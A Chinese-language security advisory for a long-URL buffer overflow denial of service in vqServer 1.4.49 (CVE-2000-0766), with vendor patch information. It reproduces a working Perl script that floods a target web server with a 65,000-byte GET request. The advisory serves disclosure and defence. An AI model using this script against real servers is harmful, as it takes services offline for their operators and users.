vqSoft vqServer 1.4.49远程长URL拒绝服务攻击漏洞
发布日期:2000-08-19
更新日期:2000-08-19
受影响系统:vqSoft vqServer 1.4.49
- Linux系统 kernel 2.3
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
描述:
BUGTRAQ ID:
1610
CVE(CAN) ID:
CVE-2000-0766
vqServer是一个小型的Web服务器程序,运行于Microsoft Windows系统下。
vqServer 1.4.49实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。
远程攻击者如果给服务器发送长达65000个字节的"GET"请求,服务器将会停止响应。必需重启才能恢复提供正常服务。
<*来源:auto45040 (
auto45040@hushmail.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
auto45040 (
auto45040@hushmail.com)提供了如下测试方法:
#!/usr/bin/perl
# DoS exploit for vqServer 1.4.49
# This vulnerability was discovered by nemesystm
# (
auto45040@hushmail.com)
#
# code by: sinfony (
chinesef00d@hotmail.com)
# [confess.sins.labs] (
http://www.ro0t.nu/csl)
# and DHC member
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it
die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
usage: $0 <host> \n"
if $#ARGV != 0;
use IO::Socket;
$host = $ARGV[0];
$port = 80;
print "Connecting to $host on port $port...\n";
$suck = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "$host isnt a webserver you schmuck.\n";
$a = A;
$send = $a x 65000;
print "Connected, sending exploit.\n";
print $suck "GET /$send\n";
sleep(3);
print "Exploit sent. vqServer should be dead.\n";
close($suck)
建议:
厂商补丁:
vqSoft
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
vqSoft Upgrade vqserver.zip
http://www.vqsoft.com/vq/server/vqserver.zip浏览次数:6173
严重程度:0(网友投票)
